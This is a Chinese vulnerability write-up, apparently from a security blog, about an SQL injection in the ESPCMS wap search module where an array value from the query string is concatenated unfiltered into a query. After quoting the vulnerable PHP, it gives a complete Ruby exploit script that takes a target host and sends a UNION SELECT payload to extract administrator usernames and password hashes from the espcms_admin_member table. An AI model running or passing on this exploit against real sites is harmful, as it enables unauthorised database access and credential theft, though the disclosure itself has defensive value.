Espcms wap模块SQL注入

  • A+
所属分类:漏洞时代
摘要

变量的传递过程是$_SERVER[‘QUERY_STRING’]->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。

变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。

正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。

而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。

在/interface/3gwap_search.php文件的in_result函数中:
<br /> function in_result() {</p><p>... ... ... ... ... ... ... ... ...</p><p>//从$_SERVER['QUERY_STRING']中获取数据</p><p>$urlcode = $_SERVER[ 'QUERY_STRING '];</p><p>parse_str(html_entity_decode($urlcode), $output);</p><p>... ... ... ... ... ... ... ... ...</p><p>if (is_array($output['attr' ]) && count($output['attr']) > 0) {</p><p>$db_table = db_prefix . 'model_att';</p><p>foreach ($output['attr' ] as $key => $value) {</p><p>if ($value) {</p><p>//对key过滤,忽略了value</p><p>$key = addslashes($key);</p><p>$key = $this-> fun->inputcodetrim($key);</p><p>$db_att_where = " WHERE isclass=1 AND attrname='$key'";</p><p>//要求此处$countnum>0</p><p>$countnum = $this->db_numrows($db_table, $db_att_where);</p><p>if ($countnum > 0) {</p><p>//value被拼接进入SQL语句</p><p>$db_where .= ' AND b.' . $key . '=/'' . $value . '/'' ;</p><p>}</p><p>}</p><p>}</p><p>}</p><p>if (!empty ($keyword) && empty($keyname)) {</p><p>$keyname = 'title';</p><p>$db_where.= " AND a.title like '%$keyword%'" ;</p><p>} elseif (!empty ($keyword) && !empty($keyname)) {</p><p>$db_where.= " AND $keyname like '% $keyword%'";</p><p>}</p><p>$pagemax = 15;</p><p>$pagesylte = 1;</p><p>if ($countnum > 0) {</p><p>$numpage = ceil($countnum / $pagemax);</p><p>} else {</p><p>$numpage = 1;</p><p>}</p><p>//拼接进入SQL语句</p><p>$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;</p><p>$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);</p><p>$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );</p><p>//被执行</p><p>$rs = $this->db->query($sql);</p><p>... ... ... ... ... ... ... ... ...</p><p>}<br />
因此若传入数组且key经过构造的话,可以达到SQL注入的目的

PoC:
<br /> require "net/http"</p><p>require "uri"</p><p>def request(method, url)</p><p> if method.eql?("get")</p><p> uri = URI.parse(url)</p><p> http = Net::HTTP.new(uri.host, uri.port)</p><p> response = http.request(Net::HTTP::Get.new(uri.request_uri))</p><p> return response</p><p> end</p><p>end</p><p>doc =<<HERE</p><p>-------------------------------------------------------</p><p>Espcms Inejction Exploit</p><p>Author:ztz</p><p>Blog:http://ztz.fuzzexp.org/</p><p>-------------------------------------------------------</p><p>HERE</p><p>usage =<<HERE</p><p>Usage: ruby #{$0} host port path</p><p>example: ruby #{$0} www.target.com 80 /</p><p>HERE</p><p>puts doc</p><p>if ARGV.length < 3</p><p> puts usage</p><p>else</p><p> $host = ARGV[0]</p><p> $port = ARGV[1]</p><p> $path = ARGV[2]</p><p> puts "[*]send request..."</p><p> url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"</p><p> response = request("get", url)</p><p> result = response.body.scan(//w+&/w{32}/)</p><p> puts result</p><p>end<br />
Espcms wap模块SQL注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: